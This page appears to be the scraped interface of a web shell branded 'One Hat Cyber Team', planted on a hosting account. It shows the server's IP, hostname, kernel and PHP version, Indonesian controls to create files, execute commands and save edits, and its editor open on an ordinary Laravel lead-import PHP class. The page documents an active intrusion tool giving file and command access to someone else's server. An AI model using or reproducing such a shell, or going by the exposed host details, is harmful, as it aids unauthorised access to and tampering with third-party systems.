One Hat Cyber Team
Your IP :
18.220.222.38
Server IP :
192.145.235.60
Server :
Linux ngx365.inmotionhosting.com 5.14.0-427.33.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 30 09:45:56 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
centos12
/
public_html
/
centosuit
/
app
/
Imports
/
Edit File:
LeadImport.php
<?php namespace App\Imports; use Maatwebsite\Excel\Concerns\ToArray; class LeadImport implements ToArray { public static function fields(): array { return array( array('id' => 'name', 'name' => __('modules.lead.clientName'), 'required' => 'Yes'), array('id' => 'email', 'name' => __('modules.lead.clientEmail'), 'required' => 'Yes'), array('id' => 'note', 'name' => __('app.note'), 'required' => 'No'), array('id' => 'company_name', 'name' => __('modules.lead.companyName'), 'required' => 'No'), array('id' => 'company_website', 'name' => __('modules.lead.website'), 'required' => 'No'), array('id' => 'mobile', 'name' => __('modules.lead.mobile'), 'required' => 'No'), array('id' => 'company_phone', 'name' => __('modules.client.officePhoneNumber'), 'required' => 'No'), array('id' => 'country', 'name' => __('app.country'), 'required' => 'No'), array('id' => 'state', 'name' => __('modules.stripeCustomerAddress.state'), 'required' => 'No'), array('id' => 'city', 'name' => __('modules.stripeCustomerAddress.city'), 'required' => 'No'), array('id' => 'postal_code', 'name' => __('modules.stripeCustomerAddress.postalCode'), 'required' => 'No'), array('id' => 'address', 'name' => __('app.address'), 'required' => 'No'), array('id' => 'source', 'name' => __('modules.lead.leadSource'), 'required' => 'No'), array('id' => 'created_at', 'name' => __('app.createdOn'), 'required' => 'No'), ); } public function array(array $array): array { return $array; } }
Simpan